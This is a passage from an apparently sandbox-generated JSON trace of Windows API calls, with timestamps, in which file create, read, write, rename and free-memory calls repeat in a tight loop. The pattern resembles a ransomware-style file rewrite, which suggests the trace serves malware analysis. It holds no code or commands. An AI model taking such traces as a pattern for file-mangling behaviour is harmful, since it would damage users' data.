"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,565", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,565", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,585", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,585", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,585", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,595", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,595", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,595", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,605", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,605", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,605", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,605", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,605", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,605", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,605", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,605", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,615", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,615", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,615", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,625", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,625", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,635", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,635", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,635", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,635", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,635", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,635", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,635", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,635", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,645", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,645", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,645", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,645", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,645", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,645", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,655", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,655", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,655", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,655", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,655", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,655", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,665", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,665", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,665", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,665", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,665", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,665", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,665", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,665", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,675", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,675", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,675", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,675", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,675", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,675", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,675", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,675", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,685", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,685", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,695", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,705", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,705", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,705", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,715", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,715", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,725", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,725", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,735", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,735", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,735", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,735", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,735", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,735", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,735", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,735", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,745", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,745", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,755", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,765", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,765", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,775", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,785", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,795", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,795", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,805", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,815", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,825", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,825", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,835", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,835", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,835", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,835", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,835", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,835", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,835", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,845", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,845", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,855", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,865", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,865", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,865", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,865", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,865", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,865", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,875", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,885", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,885", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "MoveFileWithProgressW"}, {"category": 